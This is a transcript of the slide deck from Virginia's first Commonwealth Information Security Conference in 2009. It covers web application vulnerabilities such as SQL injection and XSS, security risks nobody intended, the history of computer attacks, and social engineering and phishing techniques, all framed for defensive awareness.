First Annual Commonwealth Information Security Conference - PowerPoint PPT Presentation

View by Category
About This Presentation
Title:

First Annual Commonwealth Information Security Conference

Description:

First Annual Commonwealth Information Security Conference – PowerPoint PPT presentation

Number of Views:267
Avg rating:3.0/5.0
Slides: 175
Provided by: walterku
Category:

less

Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: First Annual Commonwealth Information Security Conference


1
First Annual CommonwealthInformation Security
Conference
www.vita.virginia.gov
2
Agenda
  • Walter KucharskiTop 10 Commonwealth Information
    Security Issues/Opportunities/Concerns/Risks
  • John GreenApplication Security Why Firewalls
    Arent Enough Anymore
  • Keynote Gino MenchiniGovernment IT The New
    Expectations and Challenges
  • Randy MarchanyUnintended Consequences Don't
    Create New Risks
  • Eric TaylorIT Seppuku Why Do We Still Suffer
    Security Violations
  • Bob BasketteSocial Engineering Building Bridges
    to Confidential Data

3
Commonwealth Information Security Conference
  • November 2, 2009

4
AGA Top Ten List -- 2009
  1. STIMULUS MONEY -- ARRA
  2. DATA SECURITY
  3. VITA/NORTHROP GRUMMAN
  4. ENTERPRISE APPLICATION/DATA EXCHANGE STANDARDS
  5. MORE TIMELY FINANCIAL INFORMATION

AUDITOR OF PUBLIC ACCOUNTS
5
AGA Top Ten List -- 2009
  • ADMINISTRATIVE DUTIES CONSOLIDATION
  • SUCCESSION PLANNING
  • PERFORMANCE MANAGEMENT / MEASURES
  • CONTRACT MANAGEMENT
  • PPEA / PPTA

AUDITOR OF PUBLIC ACCOUNTS
6
The FUTURE -- 2009
  • Financial statements will need to be completed
    and issued with 90 days and the single audit
    within 4 months
  • The State needs newer accounting systems and one
    sole enterprise application will probably not be
    the answer
  • Data security concerns will continue to grow
  • There will be increasing e-commerce and data
    exchange between federal, local and state
    government
  • Information technology infrastructure and systems
    will become commodities and shared

AUDITOR OF PUBLIC ACCOUNTS
7
Concerns
  • WHAT IS PRIVACY?
  • WHAT IS TRANSPARENCY?

AUDITOR OF PUBLIC ACCOUNTS
8
Concerns
  • DATA SECURITY -- Employees
  • VITA/NORTHROP GRUMMAN
  • DATA EXCHANGE STANDARDS
  • MORE TIMELY FINANCIAL INFORMATION
  • CONSOLIDATING ADMINISTRATIVE DUTIES

AUDITOR OF PUBLIC ACCOUNTS
9
Concerns
  • ACCOUNTING/ WORKFLOW SYSTEM CONTROLS WILL REPLACE
    MANUAL CONTROLS
  • E-COMMERCE AND DATA EXCHANGE BETWEEN FEDERAL,
    LOCAL AND STATE GOVERNMENT
  • SHARED INFORMATION TECHNOLOGY INFRASTRUCTURE AND
    SYSTEMS AS COMMODITIES

7
AUDITOR OF PUBLIC ACCOUNTS
10
What is an ISO
  • Paper pusher or Policeman
  • Management Oversight or One of the Gang
  • Tail-end Reviewer or System Developer and
    Guardian
  • Risk Manager or Elephant Parade Cleaner

AUDITOR OF PUBLIC ACCOUNTS
11
Application SecurityWhy Firewalls Are Not Enough
  • John Green
  • Chief Information Security Officer
  • Commonwealth of Virginia

www.vita.virginia.gov
www.vita.virginia.gov
12
Todays Agenda
  • Introduction
  • Lessons From History
  • Threats and Vulnerabilities
  • Opportunities For Mitigation
  • Resources
  • Questions

www.vita.virginia.gov
13
Application Vulnerabilities Skyrocketing!
  • Web vulnerabilities have increased from 1.9 of
    all published vulnerabilities in 2006 to over 52
    in 2009.
  • Application vulnerabilities from 2007 to 2008
    increased by 154.
  • WhiteHat Security said about 70 of websites it
    scans are likely to have at least one critical
    website vulnerability.

www.vita.virginia.gov
Source http//www.ncircle.com/index.php?ssolutio
n_Web-Application-Vulnerability-Statistics
14
Largest Breaches In History
www.vita.virginia.gov
15
Why? Money!

www.vita.virginia.gov
16
Firewall Are No Longer Enough
  • Firewalls have been around a while
  • Primary purpose To stop unwanted traffic from
    crossing network boundaries
  • Hackers are walking right through them
  • Perimeter firewalls are necessary, but no longer
    sufficient!
  • History shows us why

www.vita.virginia.gov
17
Impenetrable Defenses Of France
"We could hardly dream of building a kind of
Great Wall of France, which would in any case be
far too costly. Instead we have foreseen powerful
but flexible means of organizing defense, based
on the dual principle of taking full advantage of
the terrain and establishing a continuous line of
fire everywhere." Maginot
www.vita.virginia.gov
18
21st Century Maginot Line
Internal Networks
Router
Router
Email
Maginot Line Term used now for something that is
confidently relied upon but ends up being
ineffective.
Web
www.vita.virginia.gov
19
May 10, 1940 - What Went Wrong?
  • Defenses based on past threat
  • Perimeter protection
  • No layered defenses
  • Holes
  • Ardennes Forest
  • Belgium was an ally
  • Maginot Line never fell
  • Bypassed
  • Surrendered

www.vita.virginia.gov
20
Firewalls Do Not Stop Todays Threat
Internal Networks
DB Server
DB Server
Router
Router
Email
Web
www.vita.virginia.gov
21
2008 Symantec Threat Report
  • 63 percent of vulnerabilities affected Web
    applications, an increase from 59 percent in 2007
  • There were 12,885 site-specific cross-site
    scripting vulnerabilities identified, compared
    to17,697 in 2007 of the vulnerabilities
    identified in 2008, only 3 percent (394
    vulnerabilities) had been fixed at the time of
    writing.
  • The education sector represented the highest
    number of known data breaches that could lead to
    identity theft, accounting for 27 percent of the
    total
  • The government sector ranked second and accounted
    for 20 percent of data breaches that could lead
    to identity theft.
  • Hacking ranked second for identities exposed in
    2008, with 22 percent this is a large decrease
    from 2007, when hacking accounted for 62 percent
    of total identities exposed.

www.vita.virginia.gov
Source http//www.symantec.com/business/theme.jsp
?themeidthreatreport
22
OWASP Top 10 Application Flaws
Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
Information Leakage and Improper Error Handling Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.
Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.
Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes.
Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary
Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.
www.vita.virginia.gov
Source http//www.owasp.org/index.php/Top_10_200
7
23
WASC Application Vulnerability Statistics
Web Application Security Consortium (WASC )
Report 2008 includes data from 12186 web
applications evaluated. Compared to 2007, the
number of sites with wide spread SQL Injection
and Cross-site Scripting vulnerabilities fell by
13 and 20, respectively, however, the number
of sites with different types of Information
Leakage rose by 24. On the other hand, the
probability to compromise a host automatically
rose from 7 to 13 .
www.vita.virginia.gov
Source http//projects.webappsec.org/Web-Applicat
ion-Security-Statistics
24
SQL-injection Information
  • Can occur whenever client-side data is used to
    construct an SQL query without first adequately
    constraining or sanitizing the client-side input.
    The use of dynamic SQL statements (the formation
    of SQL queries from several strings of
    information) can provide the conditions needed to
    exploit the backend database that supports the
    web server.
  • SQL injections allow for the execution of SQL
    code under the privileges of the system ID used
    to connect to the backend database.
  • Malicious code can be inserted into a web form
    field or the websites code to make a system
    execute a command-shell or other arbitrary
    command.
  • In addition to command execution exploitation,
    this vulnerability may allow a malicious
    individual to change the content of the back-end
    database and therefore the information displayed
    by the website.

www.vita.virginia.gov
25
Cross-Site Scripting (XSS)
  • Allows a malicious individual to utilize a
    website address that does not belong to the
    malicious individual for malicious purposes.
  • Cross Site Scripting attacks are the result of
    improper filtering of input obtained from unknown
    or untrusted sources.
  • Cross-Site Scripting attacks occur when a
    malicious individual utilizes a web application
    to send malicious code, generally in the form of
    a browser side script, to an unsuspecting user.
  • The parameters entered into a web form is
    processed by the web application and the correct
    combination of variables can result in arbitrary
    command execution.

www.vita.virginia.gov
26
Cross-Site Scripting (XSS)
  • The unsuspecting users browser has no way to
    know that the script should not be trusted, and
    will execute the script.
  • Because the unsuspecting users browser believes
    that the script came from a trusted source, the
    malicious script can access any cookies, session
    tokens, or other sensitive information retained
    by the unsuspecting users browser.
  • The injected code then takes advantage of the
    trust given by the unsuspecting user to the
    vulnerable site. These attacks are usually
    targeted to all users of a web application
    instead of the application itself.

www.vita.virginia.gov
27
Opportunities For Mitigation
  • Personnel Awareness Training
  • Systems Development Life Cycle
  • New Development
  • Application Procurement
  • Legacy Applications

www.vita.virginia.gov
28
Systems Development Life Cycle
  • Project Initiation
  • Classify the data that the system will process
  • Determine if sensitive data absolutely must be
    collected and/or stored
  • Perform risk analysis based on known requirements
    classification of data
  • Develop an initial IT System Security Plan
  • Project Definition
  • Identify, document incorporate security control
    requirements into IT System design specifications
  • Develop evaluation procedures to validate that
    security controls
  • Update the IT System Security Plan to include
    controls
  • Implementation
  • Execute the evaluation procedures
  • Conduct a risk assessment to evaluate overall
    system risk
  • Update the IT System Security Plan to include
    controls
  • Disposition
  • Require that data retention schedules are adhered
    to
  • Require that electronic media is sanitized prior
    to disposal

www.vita.virginia.gov
29
New Development
  • Push security involvement to the front end of
    development
  • Security Design (for sensitive systems)
  • Encrypted communication channels
  • Sensitive information shall not be stored in
    hidden fields
  • Application Development
  • Application-based authentication shall be
    performed for access to data that is not
    considered publicly accessible
  • Support inactivity timeouts on user sessions
  • Data storage must be separated from the
    application interface
  • Validate all input irrespective of source, focus
    on server-side
  • Implement a default deny policy for access
    control
  • Use the least set of privileges required for
    processing
  • Internal testing must include one of penetration
    testing, fuzz testing or source code auditing
  • Clear cached and temporary data upon exit
  • Production and Maintenance
  • Scan internet-facing sensitive applications
    periodically for vulnerabilities

www.vita.virginia.gov
30
Applications Procurement
  • Work to incorporate language into contracts that
    includes
  • General
  • Personnel, Security Training, Background Checks
  • Vulnerabilities, Risks and Threats
  • Application Development
  • Development Environment
  • Secure coding, Configuration management,
    Distribution, Disclosure, Evaluation
  • Testing
  • General, Source Code, Vulnerability and
    Penetration Test
  • Patches and Updates
  • Tracking Security Issues
  • Delivery Of The Secure Application
  • Self Certification
  • No Malicious Code
  • Security Acceptance And Maintenance
  • Acceptance
  • Investigating Security Issues

www.vita.virginia.gov
Source http//www.sans.org/appseccontract/
31
Legacy Applications
  • Periodic application vulnerability scanning
  • Strong configuration management
  • If vulnerabilities are identified
  • Each application may have specific challenges
  • Case by case analysis may reveal options
  • Easy fix
  • Virtualization
  • Host based intrusion prevention
  • Application firewall technology
  • Third party integration
  • Other technology

www.vita.virginia.gov
32
Resources
www.vita.virginia.gov
33
www.OWASP.org
www.vita.virginia.gov
34
2009 CWE/SANS Top 25
www.vita.virginia.gov
35
http//iase.disa.mil/stigs/checklist/
www.vita.virginia.gov
36
http//trustedsignal.com/secDevChecklist.html
Recommended!
www.vita.virginia.gov
37
Organizational Resources
  • Agency Information Security Officer
  • Commonwealth Security and Risk Management
  • Other Resources?
  • CommonwealthSecurity_at_vita.virginia.gov

www.vita.virginia.gov
38
Conclusions
  • Largest breaches in history due to application
    vulnerabilities
  • Firewalls are necessary but wont protect
    vulnerable applications
  • SQL injection and Cross Site Scripting top the
    lists of vulnerabilities measured and attacked
  • Many opportunities to address the problem of
    insecure code
  • Plenty of resources to help, USE THEM!

www.vita.virginia.gov
39
GEN. Patton on Usefulness of Firewalls
"Fixed fortifications are monuments to the
stupidity of man."
www.vita.virginia.gov
40
Questions?
  • Thank You!
  • John.Green_at_vita.virginia.gov

www.vita.virginia.gov
41
ITS ALL ABOUT SERVICE
DRAFT for Review_v.4
Gino Menchini Managing Director
42
The City of New York
  • Resident population of over 8 million daytime
    population of 10 million
  • Over 350,000 City employees, 300,000 retirees
  • New York City Government includes its 5 counties
  • The 1 million student school system reports to
    the Mayor
  • Annual budget exceeds 59.5 billion dollars
  • If New York City was a private sector
    corporation, it would be in the Top 30 of the
    Fortune 500 companies
  • Over 120 agencies, offices, and organizations
    make up The City

43
New York City as a Bellwether Local Government
IT on Steroids
  • New Breed of Leadership Significant expansion
    in the role of IT
  • Mayor Michael R. Bloomberg Business IT
    experience
  • Younger commissioners, senior staff, and
    legislators demand more of IT
  • Higher expectations on Government from the public
  • They demand to perform transactions seamlessly
    through the Government walk-in, web and call
    centers
  • Publics perception of the competency of an
    administration is increasingly shaped by the ease
    of access/response

44
The role of IT in Emergency Response and
Preparedness
  • Focus on Public Safety Technologies
  • 911 CAD systems and infrastructure - 311
  • First Responder Radio infrastructure
  • Command and Control Communications
  • Greater Dependence on
  • GIS
  • Email Blackberries
  • New Technologies
  • Video Surveillance Systems Sensor systems
  • Hospital Emergency Room monitoring systems
  • AVL
  • Emergency Management Systems
  • Real time Crime Center
  • Intelligent Transportation systems
  • Access control systems
  • Telecomm carrier infrastructure survivability
    post 9/11
  • Municipal IT infrastructure Redundancy/Survivabi
    lity

45
New York City as a Bellwether Local Government
IT on Steroids
  • IT is now at the decision making table Are we
    ready?
  • Guide and manage a larger volume of IT projects
    simultaneously while advancing our IT Strategy
  • Be prepared to deliver IT projects rapidly high
    availability systems
  • Provide solutions to address the problem of the
    day Be relevant

46
NYC Department of Information Technology and
Telecommunications - Then
47
The role of the NYC Department of Information
Technology and Telecommunications - Now
48
New technologies implemented rapidly
49
New York Citys Agencies and IT
  • Highly diverse range of services, unlike private
    sector.
  • Virtually the entire range of Government Public
    Sector Services are provided by New York City
    from Child care to Anti-terrorism, Street
    cleaning to fresh water reservoirs.
  • Agencies are organized and staffed to focus on
    their area of responsibility and specialization
    (silos).
  • Specialized agency specific IT applications need
    to be implemented and supported by agencies.
  • High availability is required. Security is
    expected.

50
Unintended Consequences Dont Create New Risks
  • Randy Marchany, VA Tech IT Security Office

51
What People Think of Security
Internal Network
The Firewall will protect us!
The Big Bad Internet
52
What I meant is not what I said
  • Schneiers article
  • http//www.schneier.com/essay-210.html
  • Google street view
  • County records
  • Account lockout the easy DOS
  • SSN finders SSN generators?
  • Fundrace.org
  • P2P
  • Spammers and FOIA
  • Classroom locks?
  • Emergency Messaging Systems

53
Inside the Twisted Mind.
  • Security mindset involves thinking how things
    can be made to fail
  • Otherwise, you never notice most security
    problems
  • Designers are so focused on making systems work
    that they dont notice how they might fail
  • They dont notice how those failures might be
    exploited

54
Inside the Twisted Mind..
  • Uncle Miltons Ant Farm
  • You filled out a card with your address and
    theyd mail you some ants but..
  • Theyll send a tube of live ants to anyone you
    tell them to
  • Smartwater
  • Liquid with unique id linked to an owner
  • Ill paint mine on YOUR stuff and then call the
    police

55
Inside The Twisted Mind
  • Auto Dealership Service Centers
  • Get my car by giving them my name
  • Get your car by giving them your name
  • Laser Printers
  • Use their disks for your storage
  • City Surveillance
  • Who watches the watchers?
  • Can you corrupt stored camera images?

56
(No Transcript)
57
(No Transcript)
58
Account Lockout
  • Whats the purpose of the lockout?
  • Log failed attempts?
  • Multiple entries in a short period of time
    usually indicate a brute force attack
  • Password strength rules in effect?
  • Designed to prevent guessable passwords

59
Account Lockout
  • How long does it take to reset the account?
  • Minutes?
  • Hours?
  • Forever?
  • After hours?
  • So, what if my attack is to lock you out?

60
Account Lockouts
  • Account Lockout Policy
  • 25 year defense
  • Old Unix systems had no password controls so this
    was the only defense against brute force guessing
  • AIX 3.1 (1993) was one of the first with
    password controls
  • Why are we still using a 25 year defense if the
    other controls are more effective?

61
SSN Finders or SSN Generators?
  • Software to search for sensitive data on
    computers
  • Can they be used to generate SSN/CCN?
  • Freeware
  • VT Find_SSNs
  • Cornell Spider
  • UT-Austin SENF
  • Commercial
  • IdentityFinder

62
Inside the Twisted Mind
63
(No Transcript)
64
(No Transcript)
65
(No Transcript)
66
(No Transcript)
67
P2P or P_at_!_at_()P
  • Ban it says the RIAA/MPAA!
  • Extension divisions use P2P to distribute
    videos/recordings to farmers
  • YouTube
  • Independent bands use P2P to sell or distribute
    their music
  • Ban P2Pbring on the antitrust lawsuits
  • Youre restricting my ability to market my
    product

68
Spammers and FOIA
  • A known spammer issued a FOIA request for all U
    of Texas faculty, staff and student email address
  • Same thing happened in VA

69
Antivirus Software Threat?
  • My job is to test security tools
  • AV Software deletes my tools because it thinks it
    knows better than me.
  • We know whats good for you. syndrome
  • Its a race to create the exception list ?

70
Things That Make You Go Hmmm
  • Locks on doors
  • Bulletproof doors included?
  • Likelihood of mugging vs. worse
  • Dealing with 2 separate incidents
  • First event happened 7am
  • Second event happened 930am almost ¾ mile away
    from the first event
  • Insider attack

71
Campus Lockdown?
Yes, its a Airport
Approx. 2 miles
72
(No Transcript)
73
(No Transcript)
74
Understand Your Audience
  • Security Process without regard to Business
    Process
  • Business Process rule the world
  • Physical security rules can be translated to
    cybersecurity rules
  • IT people focus on technology not the business
    process. Wrong!
  • Business process doesnt consult IT when buying
    new gadgets

75
Use Risk Analysis to Build DR Plan
Business Process A
Business Process B
Business Process C
Oracle DB Forms Servers Auth Servers
Host A Host B Host C Host D Host E
Host F
76
We have met the enemy and it is vendors..
77
Its Insecure Out of the Box
  • Viruses will never be eliminated
  • Multibillion industry to fight them
  • Eliminate the threat, we no longer have
    multibillion industry.
  • Wireless cash register software sending data in
    the clear
  • Document imaging systems sending data in the
    clear
  • Govt/LE records digitized by insecure software
  • Printers, copiers based on NT!

78
Its Insecure Out of the Box
  • Security vs. Convenience
  • Let the users debug the code
  • OS vendors are starting to see the light
  • Windows XP/2003 with security features enabled
  • Apple OSX
  • Linux systems with firewall enabled
  • Application Vendors still dont get it
  • Oracle stepped in it
  • http//news.com.com/Whensecurityresearcherbecom
    etheproblem/2010-1071_3-5807074.html

79
Why is this an option? This should be the
default! Wait! I already know the last 4 digits
of my SSN so why have this at all?
80
(No Transcript)
81
(No Transcript)
82
Unlocked Key Mean Transmission In the Clear!
83
Let Me Read Your Email!
84
Why buy the cow when you can get the milk for
free?
85
(No Transcript)
86
(No Transcript)
87
(No Transcript)
88
(No Transcript)
89
(No Transcript)
90
Obtaining Personal Information
  • Public Records can be accessed from anywhere in
    the world.
  • Local governments are allowing access to
    sensitive info via the Web without thinking about
    security.

91
County Clerks and Identity Theft
  • Making legal docs available on the net w/o good
    security practices.
  • A secure www site isnt enough
  • Tom Delay SSN From Public Records
  • Jeb Bush SSN From Public Documents
  • Colin Powell Deed of Trust
  • Colin Powell SSN from Public Records
  • Do County Clerks (by extension, the state
    legislature) facilitate ID Theft?

92
Whats Going On Here?
  • Were spending to protect sensitive data
    (SSN) but.
  • State govt is allowing SSN info to be obtained
    online so.
  • Laws need to be coordinated but.
  • Update VA passed a law (7/1/08) that makes it
    illegal to distribute SSN legally obtained from
    public govt www sites ?

93
(No Transcript)
94
The Twisted Mind
  • If youre not doing anything illegal, you
    shouldnt care whether youre surveilled
  • What if I just want to track you?
  • NY Times article on bored security staff tracking
    people on the streets.

95
T-Mobile said the company's computer forensics
and security team were "actively investigating to
determine how Ms. Hilton's information was
obtained."
96
The Twisted Mind
  • Smart phones and PDAs have become the electronic
    equivalent of the sticky note
  • Put my passwords in the device
  • What if I drain your battery?

97
Virtualization
  • Use it to check for unintended consequences
  • Build test systems then apply Schneiers rule to
    them
  • Lets see a demo..

98
Should We Give Up?
  • NO! But examine solutions carefully to make sure
    you dont introduce a worse threat
  • Knee-jerk solutions cause worse problems
  • Apply Schneiers rules to your solution

99
Should We Give Up?
  • NO! Hold vendors accountable for their bad
    security practices
  • Insecure code
  • Stolen developer laptop syndrome
  • They modify their EULA
  • We just dont buy the product.

100
Should We Give Up?
  • NO! Increase User Awareness training.
  • Customize it. What makes sense at VT might not
    make sense in your house.
  • Helps your overall security posture.
  • If we do security for the end user, theyll never
    change their behavior.
  • All security is local.
  • A Tip ONeill twist

101
Questions?
  • Randy Marchany, VA Tech IT Security Office Lab,
    1300 Torgersen Hall, VA Tech, Blacksburg, VA
    24060
  • 540-231-9523
  • marchany_at_vt.edu
  • http//security.vt.edu

102
IT Seppuku Why Do We Still Suffer Security
Violations?
Eric Taylor Enterprise Security Architect
Northrop Grumman
103
Agenda
  • Introduction
  • Evolution of computer attacks
  • The Commonwealth over the last year
  • How Do We Avoid Security Violations

104
Cybergovernment
105
Cybercommunity
106
Cybereconomy
107
Cybergeeks
108
Cybersickness
109
Cyberbaby
110
Cyberdefense
111
Cyberspace
112
Cyberwarfare
113
Cybersabotage
114
Cybercrime
115
Cybercriminal
116
Cybertherapist
117
Cyberwarrior
118
Cybersuicide
119
Disclaimer
  • No such thing as a secure system
  • Security is hard, but the basics are easy and
    still need attention.
  • Attacks are not always technical, non-technical
    means can be used
  • Attacks take the path of least resistance

120
Evolution of computer attacks
  • Hacking for Fun (1970 1995)
  • The goal was to gain access
  • Motivation was mainly curiosity
  • Methods phreakers, password guessing, bad
    configurations, virus, trojan horses, insecure
    networks.
  • Lessons Learned
  • New Laws Congress passes the Computer Fraud and
    Abuse Act

121
Evolution of computer attacks
  • Casual Hacking (1995 2000)
  • The goal was to gain access, defacement,
    disruption.
  • The motivation was for showing off, education,
    publicity and money.
  • Methods buffer overflows, email virus/
    attachments, AOHell, Back Orifice
  • Lessons Learned
  • There is a need for compromise detection
    (intrusion detection)
  • Software security through better tools and
    languages

122
Evolution of computer attacks
  • Hacking (2001 2005)
  • The goal was to attract attention through
    large-scale activities.
  • Motivation publicity and money
  • Methods DoS, worms, rootkits, etc..
  • Lessons Learned
  • Service Denied
  • Bill Gates decrees that Microsoft will secure its
    products and services, and kicks off a massive
    internal training and quality control campaign.

123
Evolution of computer attacks
  • Professional hacking (2005 - ?? )
  • The goal for system compromise, identity theft,
    information exfiltration, and Advanced Persistent
    Threat (APT)
  • Motivation is
  • Methods web attacks, phishing / pharming,
    spear-phishing, etc..
  • Malware, drive by downloads, FakeAV
  • Large-scale botnets, hacker service networks
  • Conficker worm infiltrated billions of PCs
    worldwide

124
Commonwealth over the last year
  • Malware / Worms
  • Over a three month period, 1335 total unique
    infections (fakeav and others)
  • Conficker
  • FakeAV
  • Mobile Devices
  • USB drives
  • Lost Flash drives
  • Conficker
  • Stolen or lost Laptops
  • Unsecure configurations
  • Systems not locked down before production

125
Commonwealth over the last year
  • Information leakage
  • Posting sensitive information to public website
  • Human Error
  • Application Security
  • According to Privacy Clearing house, one incident
    in 2009, Virginia provided individual
    notifications to 530,000 people
  • 530,000 x .50 265,000 (estimate for stamps
    and envelopes)
  • Social Engineering
  • Spear phishing user accounts throughout the
    Commonwealth

126
Commonwealth Incidents
  • Malware
  • 66 over the last year
  • Major Outages
  • Unauthorized Access Attempts
  • 3 instances of Virginia Agencies in 2009 appear
    on the Privacy Clearing House - A Chronology of
    Data Breaches website.

127
The Stop and Rob
Charlie 16 to dispatch, we are currently 10-8 at
the Stop and Rob on 2400 block of Jeff Davis.
128
The Stop and Rob
Developer
Firewall
Access Control
Application Logic
HTTP/ HTTPS
DATA
129
The Stop and Rob
Charlie 16 to dispatch, we are currently 10-8 at
the Stop and Rob on 2400 block of Jeff Davis.
Firewall
Access Control
Application Logic
Bad Guy
Developer
DATA
130
How Do We AvoidSecurity Violations?
  • 20 Critical Controls, prioritized baseline of
    information security measures and controls
  • Boundary Defense
  • Avoiding Insecure Network Designs
  • Patch Management
  • User Awareness
  • Least Privilege
  • End Point or Client Side Security

NOTE - SANS 20 Critical Security Controls -
Version 2.1
131
How Do We AvoidSecurity Violations?
  • Secure SDLC Processes
  • Security As Weighted Factor During the
    Procurement Process
  • Application Security
  • Security Skill Assessment and Appropriate Training

132
Summary
  • We are still learning our lessons
  • Attackers are more advanced then ever before
  • Security must start from the beginning
  • The Commonwealth is a target

133
Social Engineering Building Bridges to
Confidential Data
  • Bob Baskette
  • CISSP-ISSAP, CCNP/CCDP, RHCT
  • Commonwealth Security Architect

www.vita.virginia.gov
134
Why Information Security Matters
  • Computer systems have an inherent value to both
    the computer system owner and those malicious
    individuals who seek the data stored on the
    computer systems and the available processing
    power the computer systems possess
  • Malicious individuals may also be interested in
    taking over the computer system to store illegal
    materials or launch attacks that will be traced
    back to the compromised system instead of the
    malicious individual

135
Social Engineering
  • The use of influence and persuasion to deceive
    people for the purpose of obtaining information
    or persuading a victim to perform some action
  • Based on the building of inappropriate trust
    relationships
  • Will target Help Desk personnel, onsite
    employees, and contractors
  • Is one of the most potentially dangerous attacks
    since it does not directly target technology

136
Factors in Social Engineering
  • Desire to be helpful
  • Tendency to trust people
  • Fear of getting in trouble
  • Art of Manipulation (the ability to blend-in)

137
Social Engineering Behavioral Types
  • Scarcity
  • Belief that an item is in short supply
  • Commonly used by marketing
  • Authority
  • Based on premise of power
  • Liking
  • Based on the fact that people tend to help people
    they like

138
Social Engineering Behavioral Types
  • Consistency
  • Based on the fact that people like to be
    consistent
  • Social Validation
  • If one person does it, others will follow
  • Reciprocation
  • One good turn deserves another

139
Social Engineering Attack Types
  • Human-based (Person-to-Person)
  • Computer-Based (Automated)

140
Human-based (Person-to-Person)
  • Uses the following techniques
  • Shoulder surfing
  • Dumpster diving
  • Impersonation
  • Intimidation
  • Using third-party approval

141
Human-based (Person-to-Person)
  • Impersonation (Masquerading)
  • Attacker pretends to be someone else
  • Can impersonate an new employee, valid user,
    business client, janitor, delivery person, or
    mail room person
  • Attack carries a higher risk since the attacker
    is inside the facility perimeter
  • Intimidation (Posing as an important user)
  • Attacker pretends to be an important user
  • Works on the belief that it is not good to
    question authority
  • Using third person authorization
  • Attacker convinces the victim that the attacker
    has approval from a third party that is an
    authoritative source
  • Works on the belief that most people are good and
    truthful

142
Human-based (Person-to-Person)
  • Reverse Social Engineering
  • Considered to be the most difficult type of
    Social Engineering attack
  • Requires a tremendous amount of preparation and
    skill
  • Act as help-desk or admin staff to request
    information
  • Can involve sabotaging the victims equipment and
    then offering to fix the problem
  • Can be difficult to execute since the first step
    requires the sabotage of a system
  • Target could be a external utility such as a
    phone line
  • Deliver defective equipment and then offer to
    repair
  • Attach business card to toner box or laptop case

143
Computer-Based (Automated)
  • Phishing and Spam
  • Email attachments
  • Fake websites
  • Pop-up messages
  • Drive-by downloads
  • DNS Cache poisoning
  • Spoofed SSL-certificates

144
SPAM and the Flying Circus
  • Spam is the intentional abuse or misuse of
    electronic messaging systems to send unsolicited
    bulk messages
  • SPAM is normally associated with e-mail spam, can
    be used with other electronic transmission types
    such as instant messaging, Usenet newsgroups, Web
    search engines, blogs, mobile phone messaging,
    Internet forums, and fax transmissions
  • SPAM remains economically viable because
    advertisers have no operating costs beyond the
    management of their mailing lists, and it is
    difficult to hold senders accountable for their
    mass mailings
  • Today, SPAM is increasingly sourced from bot
    networks. Many modern worms install a backdoor
    which allows the spammer access to the computer
    and use it for malicious purposes
  • SPAM email-chains are still very popular
    promising good fortune if the chain is not broken

145
Phishing Basics
  • Phishing campaigns use either email or malicious
    web sites to solicit personal information from
    targeted individuals
  • Attackers attempt to replicate the look and
    format of emails from reputable companies,
    government agencies, or financial institutions
  • The Phishing messages appear to come from popular
    social networking sites, auction sites, online
    payment processors or IT Administrators to entice
    the unsuspecting public to respond
  • Phishing campaigns that target specific
    categories or groups of users are known as Spear
    Phishing Campaigns

146
Phishing Basics
  • People respond without thinking to things that
    seem important
  • Email subjects lines worded to create anxiety or
    self-doubt with subject lines such as Do you
    trust her/him or Is she/he cheating on you
    usually entice immediate action
  • Email with the subjects such as Your bank
    account has been suspended or There is a
    problem with your bank account will usually get
    instant attention and prompt most people to click
    on the listed URL to determine what has happened

147
Pop-up messages
  • Can prompt victim for numerous types of
    information
  • Can be very successful since the message appears
    to be a system message referencing loss of access
    or malicious software detection
  • Has been used successfully to install malicious
    software under the pretense of removing malicious
    software

148
Drive-By Downloads
  • Uses legitimate websites to infect end users
  • The legitimate website is compromised by a
    malicious individual to add hidden frames,
    malicious URLs, or malicious scripts to the
    legitimate website
  • The users browser retrieves the information
    associated with the malicious URL or script and
    becomes infected with malicious software
  • ClickJacking Use of hidden frames on web pages
    to entice the user into clicking on malicious URLs

149
DNS Cache Poisoning
  • Uses DNS responses to redirect users to malicious
    websites
  • Uses multiple techniques to load malicious
    IP-address information into legitimate DNS
    servers
  • Removes the need to trick a user into visiting a
    malicious website since the malicious IP-address
    is provided by a legitimate DNS server

150
SSL Certificate Spoofing
  • MD5 Hash Collision/Digital Signature transfer
  • A vulnerability in the Internet Public Key
    Infrastructure (PKI) used to issue digital
    certificates for secure websites has been
    identified
  • Utilizes a weakness in the MD5 cryptographic hash
    function to allow the construction of different
    messages with the same MD5 hash
  • This vulnerability can be used to create a rogue
    Certification Authority (CA) certificate trusted
    by all common web browsers
  • This rogue certificate can be used to impersonate
    any website on the Internet, including banking
    and e-commerce sites secured using the HTTPS
    protocol

151
SSL Certificate Spoofing/Piggybacking
  • Piggybacking SSL Certificates
  • Allows multiple phishing attacks on a single
    certificate
  • A single compromised Web server with a valid SSL
    certificate can be used to host multiple phishing
    sites since visitors to the phishing sites
    erroneously believe that they have a secure
    connection with original website
  • Visitors could only detect the fake SSL
    certificate if they reviewed the certificate or
    had access to other visual indicators (secured
    with an extended validation SSL certificate)

152
SSL Certificate Spoofing/URL Obfuscation
  • NULL character attack
  • Convinces the end-user that a certificate has
    been issued to a different domain than the one to
    which is was actually issued
  • The use of NULL characters provides the ability
    to put up a certificate on what appears to be the
